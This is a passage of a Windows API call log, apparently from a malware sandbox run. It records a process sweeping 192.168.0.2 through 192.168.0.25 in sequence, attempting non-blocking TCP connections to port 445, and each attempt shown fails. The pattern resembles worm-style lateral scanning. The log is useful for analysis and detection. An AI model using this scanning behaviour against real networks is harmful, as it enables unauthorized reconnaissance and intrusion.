inet_addr (cp="192.168.0.2") returned 0x200a8c0 [0121.847] htons (hostshort=0x1bd) returned 0xbd01 [0121.847] ioctlsocket (in: s=0x390, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0121.847] connect (s=0x390, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.2"), namelen=16) returned -1 [0121.847] ioctlsocket (in: s=0x390, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0121.847] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0122.900] __WSAFDIsSet (param_1=0x390, param_2=0x36ef368) returned 0 [0122.900] GetLastError () returned 0x0 [0122.900] SetLastError (dwErrCode=0x0) [0122.900] GetLastError () returned 0x0 [0122.900] SetLastError (dwErrCode=0x0) [0122.900] htonl (hostlong=0xc0a80003) returned 0x300a8c0 [0122.900] inet_ntoa (in=0x300a8c0) returned="192.168.0.3" [0122.900] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0122.900] socket (af=2, type=1, protocol=6) returned 0x398 [0122.900] inet_addr (cp="192.168.0.3") returned 0x300a8c0 [0122.900] htons (hostshort=0x1bd) returned 0xbd01 [0122.900] ioctlsocket (in: s=0x398, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0122.900] connect (s=0x398, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.3"), namelen=16) returned -1 [0122.900] ioctlsocket (in: s=0x398, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0122.900] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0123.909] __WSAFDIsSet (param_1=0x398, param_2=0x36ef368) returned 0 [0123.909] GetLastError () returned 0x0 [0123.909] SetLastError (dwErrCode=0x0) [0123.909] GetLastError () returned 0x0 [0123.909] SetLastError (dwErrCode=0x0) [0123.909] htonl (hostlong=0xc0a80004) returned 0x400a8c0 [0123.909] inet_ntoa (in=0x400a8c0) returned="192.168.0.4" [0123.909] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0123.909] socket (af=2, type=1, protocol=6) returned 0x3a0 [0123.909] inet_addr (cp="192.168.0.4") returned 0x400a8c0 [0123.909] htons (hostshort=0x1bd) returned 0xbd01 [0123.909] ioctlsocket (in: s=0x3a0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0123.909] connect (s=0x3a0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.4"), namelen=16) returned -1 [0123.909] ioctlsocket (in: s=0x3a0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0123.909] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0124.920] __WSAFDIsSet (param_1=0x3a0, param_2=0x36ef368) returned 0 [0124.920] GetLastError () returned 0x0 [0124.920] SetLastError (dwErrCode=0x0) [0124.920] GetLastError () returned 0x0 [0124.920] SetLastError (dwErrCode=0x0) [0124.920] htonl (hostlong=0xc0a80005) returned 0x500a8c0 [0124.920] inet_ntoa (in=0x500a8c0) returned="192.168.0.5" [0124.920] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0124.920] socket (af=2, type=1, protocol=6) returned 0x3a8 [0124.920] inet_addr (cp="192.168.0.5") returned 0x500a8c0 [0124.920] htons (hostshort=0x1bd) returned 0xbd01 [0124.920] ioctlsocket (in: s=0x3a8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0124.920] connect (s=0x3a8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.5"), namelen=16) returned -1 [0124.920] ioctlsocket (in: s=0x3a8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0124.920] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0125.975] __WSAFDIsSet (param_1=0x3a8, param_2=0x36ef368) returned 0 [0125.975] GetLastError () returned 0x0 [0125.975] SetLastError (dwErrCode=0x0) [0125.975] GetLastError () returned 0x0 [0125.975] SetLastError (dwErrCode=0x0) [0125.975] htonl (hostlong=0xc0a80006) returned 0x600a8c0 [0125.975] inet_ntoa (in=0x600a8c0) returned="192.168.0.6" [0125.975] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0125.975] socket (af=2, type=1, protocol=6) returned 0x3b0 [0125.975] inet_addr (cp="192.168.0.6") returned 0x600a8c0 [0125.975] htons (hostshort=0x1bd) returned 0xbd01 [0125.975] ioctlsocket (in: s=0x3b0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0125.975] connect (s=0x3b0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.6"), namelen=16) returned -1 [0125.976] ioctlsocket (in: s=0x3b0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0125.976] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0127.273] __WSAFDIsSet (param_1=0x3b0, param_2=0x36ef368) returned 0 [0127.273] GetLastError () returned 0x0 [0127.273] SetLastError (dwErrCode=0x0) [0127.273] GetLastError () returned 0x0 [0127.273] SetLastError (dwErrCode=0x0) [0127.273] htonl (hostlong=0xc0a80007) returned 0x700a8c0 [0127.273] inet_ntoa (in=0x700a8c0) returned="192.168.0.7" [0127.273] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0127.273] socket (af=2, type=1, protocol=6) returned 0x394 [0127.273] inet_addr (cp="192.168.0.7") returned 0x700a8c0 [0127.273] htons (hostshort=0x1bd) returned 0xbd01 [0127.273] ioctlsocket (in: s=0x394, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0127.273] connect (s=0x394, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.7"), namelen=16) returned -1 [0127.274] ioctlsocket (in: s=0x394, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0127.274] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0128.274] __WSAFDIsSet (param_1=0x394, param_2=0x36ef368) returned 0 [0128.274] GetLastError () returned 0x0 [0128.274] SetLastError (dwErrCode=0x0) [0128.274] GetLastError () returned 0x0 [0128.274] SetLastError (dwErrCode=0x0) [0128.274] htonl (hostlong=0xc0a80008) returned 0x800a8c0 [0128.274] inet_ntoa (in=0x800a8c0) returned="192.168.0.8" [0128.274] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0128.274] socket (af=2, type=1, protocol=6) returned 0x3c0 [0128.274] inet_addr (cp="192.168.0.8") returned 0x800a8c0 [0128.274] htons (hostshort=0x1bd) returned 0xbd01 [0128.274] ioctlsocket (in: s=0x3c0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0128.274] connect (s=0x3c0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.8"), namelen=16) returned -1 [0128.275] ioctlsocket (in: s=0x3c0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0128.275] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0129.289] __WSAFDIsSet (param_1=0x3c0, param_2=0x36ef368) returned 0 [0129.289] GetLastError () returned 0x0 [0129.289] SetLastError (dwErrCode=0x0) [0129.289] GetLastError () returned 0x0 [0129.289] SetLastError (dwErrCode=0x0) [0129.289] htonl (hostlong=0xc0a80009) returned 0x900a8c0 [0129.289] inet_ntoa (in=0x900a8c0) returned="192.168.0.9" [0129.289] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0129.289] socket (af=2, type=1, protocol=6) returned 0x3c8 [0129.289] inet_addr (cp="192.168.0.9") returned 0x900a8c0 [0129.289] htons (hostshort=0x1bd) returned 0xbd01 [0129.289] ioctlsocket (in: s=0x3c8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0129.289] connect (s=0x3c8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.9"), namelen=16) returned -1 [0129.289] ioctlsocket (in: s=0x3c8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0129.289] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0130.302] __WSAFDIsSet (param_1=0x3c8, param_2=0x36ef368) returned 0 [0130.302] GetLastError () returned 0x0 [0130.302] SetLastError (dwErrCode=0x0) [0130.302] GetLastError () returned 0x0 [0130.302] SetLastError (dwErrCode=0x0) [0130.302] htonl (hostlong=0xc0a8000a) returned 0xa00a8c0 [0130.302] inet_ntoa (in=0xa00a8c0) returned="192.168.0.10" [0130.302] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0130.302] socket (af=2, type=1, protocol=6) returned 0x3cc [0130.302] inet_addr (cp="192.168.0.10") returned 0xa00a8c0 [0130.302] htons (hostshort=0x1bd) returned 0xbd01 [0130.302] ioctlsocket (in: s=0x3cc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0130.302] connect (s=0x3cc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.10"), namelen=16) returned -1 [0130.303] ioctlsocket (in: s=0x3cc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0130.303] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0131.317] __WSAFDIsSet (param_1=0x3cc, param_2=0x36ef368) returned 0 [0131.317] GetLastError () returned 0x0 [0131.317] SetLastError (dwErrCode=0x0) [0131.317] GetLastError () returned 0x0 [0131.317] SetLastError (dwErrCode=0x0) [0131.317] htonl (hostlong=0xc0a8000b) returned 0xb00a8c0 [0131.317] inet_ntoa (in=0xb00a8c0) returned="192.168.0.11" [0131.317] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0131.317] socket (af=2, type=1, protocol=6) returned 0x3d8 [0131.317] inet_addr (cp="192.168.0.11") returned 0xb00a8c0 [0131.317] htons (hostshort=0x1bd) returned 0xbd01 [0131.317] ioctlsocket (in: s=0x3d8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0131.317] connect (s=0x3d8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.11"), namelen=16) returned -1 [0131.317] ioctlsocket (in: s=0x3d8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0131.317] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0132.330] __WSAFDIsSet (param_1=0x3d8, param_2=0x36ef368) returned 0 [0132.330] GetLastError () returned 0x0 [0132.330] SetLastError (dwErrCode=0x0) [0132.330] GetLastError () returned 0x0 [0132.330] SetLastError (dwErrCode=0x0) [0132.330] htonl (hostlong=0xc0a8000c) returned 0xc00a8c0 [0132.330] inet_ntoa (in=0xc00a8c0) returned="192.168.0.12" [0132.330] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0132.330] socket (af=2, type=1, protocol=6) returned 0x3b8 [0132.330] inet_addr (cp="192.168.0.12") returned 0xc00a8c0 [0132.330] htons (hostshort=0x1bd) returned 0xbd01 [0132.330] ioctlsocket (in: s=0x3b8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0132.330] connect (s=0x3b8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.12"), namelen=16) returned -1 [0132.331] ioctlsocket (in: s=0x3b8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0132.331] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0133.345] __WSAFDIsSet (param_1=0x3b8, param_2=0x36ef368) returned 0 [0133.345] GetLastError () returned 0x0 [0133.345] SetLastError (dwErrCode=0x0) [0133.345] GetLastError () returned 0x0 [0133.345] SetLastError (dwErrCode=0x0) [0133.345] htonl (hostlong=0xc0a8000d) returned 0xd00a8c0 [0133.345] inet_ntoa (in=0xd00a8c0) returned="192.168.0.13" [0133.345] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0133.345] socket (af=2, type=1, protocol=6) returned 0x3e8 [0133.345] inet_addr (cp="192.168.0.13") returned 0xd00a8c0 [0133.345] htons (hostshort=0x1bd) returned 0xbd01 [0133.345] ioctlsocket (in: s=0x3e8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0133.345] connect (s=0x3e8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.13"), namelen=16) returned -1 [0133.345] ioctlsocket (in: s=0x3e8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0133.345] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0134.368] __WSAFDIsSet (param_1=0x3e8, param_2=0x36ef368) returned 0 [0134.368] GetLastError () returned 0x0 [0134.368] SetLastError (dwErrCode=0x0) [0134.368] GetLastError () returned 0x0 [0134.368] SetLastError (dwErrCode=0x0) [0134.368] htonl (hostlong=0xc0a8000e) returned 0xe00a8c0 [0134.368] inet_ntoa (in=0xe00a8c0) returned="192.168.0.14" [0134.368] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0134.368] socket (af=2, type=1, protocol=6) returned 0x3ec [0134.368] inet_addr (cp="192.168.0.14") returned 0xe00a8c0 [0134.368] htons (hostshort=0x1bd) returned 0xbd01 [0134.368] ioctlsocket (in: s=0x3ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0134.368] connect (s=0x3ec, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.14"), namelen=16) returned -1 [0134.369] ioctlsocket (in: s=0x3ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0134.369] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0135.513] __WSAFDIsSet (param_1=0x3ec, param_2=0x36ef368) returned 0 [0135.513] GetLastError () returned 0x0 [0135.513] SetLastError (dwErrCode=0x0) [0135.513] GetLastError () returned 0x0 [0135.513] SetLastError (dwErrCode=0x0) [0135.513] htonl (hostlong=0xc0a8000f) returned 0xf00a8c0 [0135.513] inet_ntoa (in=0xf00a8c0) returned="192.168.0.15" [0135.513] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0135.513] socket (af=2, type=1, protocol=6) returned 0x3f8 [0135.513] inet_addr (cp="192.168.0.15") returned 0xf00a8c0 [0135.513] htons (hostshort=0x1bd) returned 0xbd01 [0135.513] ioctlsocket (in: s=0x3f8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0135.513] connect (s=0x3f8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.15"), namelen=16) returned -1 [0135.514] ioctlsocket (in: s=0x3f8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0135.514] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0136.527] __WSAFDIsSet (param_1=0x3f8, param_2=0x36ef368) returned 0 [0136.527] GetLastError () returned 0x0 [0136.527] SetLastError (dwErrCode=0x0) [0136.527] GetLastError () returned 0x0 [0136.527] SetLastError (dwErrCode=0x0) [0136.527] htonl (hostlong=0xc0a80010) returned 0x1000a8c0 [0136.527] inet_ntoa (in=0x1000a8c0) returned="192.168.0.16" [0136.527] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0136.527] socket (af=2, type=1, protocol=6) returned 0x3fc [0136.527] inet_addr (cp="192.168.0.16") returned 0x1000a8c0 [0136.527] htons (hostshort=0x1bd) returned 0xbd01 [0136.527] ioctlsocket (in: s=0x3fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0136.527] connect (s=0x3fc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.16"), namelen=16) returned -1 [0136.528] ioctlsocket (in: s=0x3fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0136.528] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0137.541] __WSAFDIsSet (param_1=0x3fc, param_2=0x36ef368) returned 0 [0137.541] GetLastError () returned 0x0 [0137.541] SetLastError (dwErrCode=0x0) [0137.541] GetLastError () returned 0x0 [0137.541] SetLastError (dwErrCode=0x0) [0137.541] htonl (hostlong=0xc0a80011) returned 0x1100a8c0 [0137.541] inet_ntoa (in=0x1100a8c0) returned="192.168.0.17" [0137.541] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0137.541] socket (af=2, type=1, protocol=6) returned 0x408 [0137.541] inet_addr (cp="192.168.0.17") returned 0x1100a8c0 [0137.541] htons (hostshort=0x1bd) returned 0xbd01 [0137.541] ioctlsocket (in: s=0x408, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0137.541] connect (s=0x408, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.17"), namelen=16) returned -1 [0137.542] ioctlsocket (in: s=0x408, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0137.542] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0138.618] __WSAFDIsSet (param_1=0x408, param_2=0x36ef368) returned 0 [0138.618] GetLastError () returned 0x0 [0138.618] SetLastError (dwErrCode=0x0) [0138.618] GetLastError () returned 0x0 [0138.618] SetLastError (dwErrCode=0x0) [0138.619] htonl (hostlong=0xc0a80012) returned 0x1200a8c0 [0138.619] inet_ntoa (in=0x1200a8c0) returned="192.168.0.18" [0138.619] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0138.619] socket (af=2, type=1, protocol=6) returned 0x414 [0138.619] inet_addr (cp="192.168.0.18") returned 0x1200a8c0 [0138.619] htons (hostshort=0x1bd) returned 0xbd01 [0138.619] ioctlsocket (in: s=0x414, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0138.619] connect (s=0x414, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.18"), namelen=16) returned -1 [0138.619] ioctlsocket (in: s=0x414, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0138.619] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0139.632] __WSAFDIsSet (param_1=0x414, param_2=0x36ef368) returned 0 [0139.632] GetLastError () returned 0x0 [0139.632] SetLastError (dwErrCode=0x0) [0139.632] GetLastError () returned 0x0 [0139.632] SetLastError (dwErrCode=0x0) [0139.632] htonl (hostlong=0xc0a80013) returned 0x1300a8c0 [0139.632] inet_ntoa (in=0x1300a8c0) returned="192.168.0.19" [0139.632] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0139.632] socket (af=2, type=1, protocol=6) returned 0x420 [0139.632] inet_addr (cp="192.168.0.19") returned 0x1300a8c0 [0139.632] htons (hostshort=0x1bd) returned 0xbd01 [0139.632] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0139.632] connect (s=0x420, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.19"), namelen=16) returned -1 [0139.632] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0139.632] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0140.644] __WSAFDIsSet (param_1=0x420, param_2=0x36ef368) returned 0 [0140.644] GetLastError () returned 0x0 [0140.644] SetLastError (dwErrCode=0x0) [0140.644] GetLastError () returned 0x0 [0140.644] SetLastError (dwErrCode=0x0) [0140.644] htonl (hostlong=0xc0a80014) returned 0x1400a8c0 [0140.644] inet_ntoa (in=0x1400a8c0) returned="192.168.0.20" [0140.645] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0140.645] socket (af=2, type=1, protocol=6) returned 0x3dc [0140.645] inet_addr (cp="192.168.0.20") returned 0x1400a8c0 [0140.645] htons (hostshort=0x1bd) returned 0xbd01 [0140.645] ioctlsocket (in: s=0x3dc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0140.645] connect (s=0x3dc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.20"), namelen=16) returned -1 [0140.645] ioctlsocket (in: s=0x3dc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0140.645] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0141.660] __WSAFDIsSet (param_1=0x3dc, param_2=0x36ef368) returned 0 [0141.661] GetLastError () returned 0x0 [0141.661] SetLastError (dwErrCode=0x0) [0141.661] GetLastError () returned 0x0 [0141.661] SetLastError (dwErrCode=0x0) [0141.661] htonl (hostlong=0xc0a80015) returned 0x1500a8c0 [0141.661] inet_ntoa (in=0x1500a8c0) returned="192.168.0.21" [0141.661] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0141.661] socket (af=2, type=1, protocol=6) returned 0x434 [0141.661] inet_addr (cp="192.168.0.21") returned 0x1500a8c0 [0141.661] htons (hostshort=0x1bd) returned 0xbd01 [0141.661] ioctlsocket (in: s=0x434, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0141.661] connect (s=0x434, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.21"), namelen=16) returned -1 [0141.661] ioctlsocket (in: s=0x434, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0141.661] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0142.673] __WSAFDIsSet (param_1=0x434, param_2=0x36ef368) returned 0 [0142.673] GetLastError () returned 0x0 [0142.673] SetLastError (dwErrCode=0x0) [0142.673] GetLastError () returned 0x0 [0142.673] SetLastError (dwErrCode=0x0) [0142.673] htonl (hostlong=0xc0a80016) returned 0x1600a8c0 [0142.673] inet_ntoa (in=0x1600a8c0) returned="192.168.0.22" [0142.673] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0142.673] socket (af=2, type=1, protocol=6) returned 0x424 [0142.673] inet_addr (cp="192.168.0.22") returned 0x1600a8c0 [0142.673] htons (hostshort=0x1bd) returned 0xbd01 [0142.673] ioctlsocket (in: s=0x424, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0142.673] connect (s=0x424, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.22"), namelen=16) returned -1 [0142.674] ioctlsocket (in: s=0x424, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0142.674] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0143.686] __WSAFDIsSet (param_1=0x424, param_2=0x36ef368) returned 0 [0143.687] GetLastError () returned 0x0 [0143.687] SetLastError (dwErrCode=0x0) [0143.687] GetLastError () returned 0x0 [0143.687] SetLastError (dwErrCode=0x0) [0143.687] htonl (hostlong=0xc0a80017) returned 0x1700a8c0 [0143.687] inet_ntoa (in=0x1700a8c0) returned="192.168.0.23" [0143.687] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0143.687] socket (af=2, type=1, protocol=6) returned 0x440 [0143.687] inet_addr (cp="192.168.0.23") returned 0x1700a8c0 [0143.687] htons (hostshort=0x1bd) returned 0xbd01 [0143.687] ioctlsocket (in: s=0x440, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0143.687] connect (s=0x440, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.23"), namelen=16) returned -1 [0143.688] ioctlsocket (in: s=0x440, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0143.688] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0144.701] __WSAFDIsSet (param_1=0x440, param_2=0x36ef368) returned 0 [0144.701] GetLastError () returned 0x0 [0144.701] SetLastError (dwErrCode=0x0) [0144.701] GetLastError () returned 0x0 [0144.702] SetLastError (dwErrCode=0x0) [0144.702] htonl (hostlong=0xc0a80018) returned 0x1800a8c0 [0144.702] inet_ntoa (in=0x1800a8c0) returned="192.168.0.24" [0144.702] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0144.702] socket (af=2, type=1, protocol=6) returned 0x44c [0144.702] inet_addr (cp="192.168.0.24") returned 0x1800a8c0 [0144.702] htons (hostshort=0x1bd) returned 0xbd01 [0144.702] ioctlsocket (in: s=0x44c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0144.702] connect (s=0x44c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.24"), namelen=16) returned -1 [0144.702] ioctlsocket (in: s=0x44c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0144.702] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0145.714] __WSAFDIsSet (param_1=0x44c, param_2=0x36ef368) returned 0 [0145.714] GetLastError () returned 0x0 [0145.714] SetLastError (dwErrCode=0x0) [0145.714] GetLastError () returned 0x0 [0145.714] SetLastError (dwErrCode=0x0) [0145.715] htonl (hostlong=0xc0a80019) returned 0x1900a8c0 [0145.715] inet_ntoa (in=0x1900a8c0) returned="192.168.0.25" [0145.715] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0145.715] socket (af=2, type=1, protocol=6) returned 0x438 [0145.715] inet_addr (cp="192.168.0.25") returned 0x1900a8c0 [0145.715] htons (hostshort=0x1bd) returned 0xbd01 [0145.715] ioctlsocket (in: s=0x438, cmd=-2147195266, 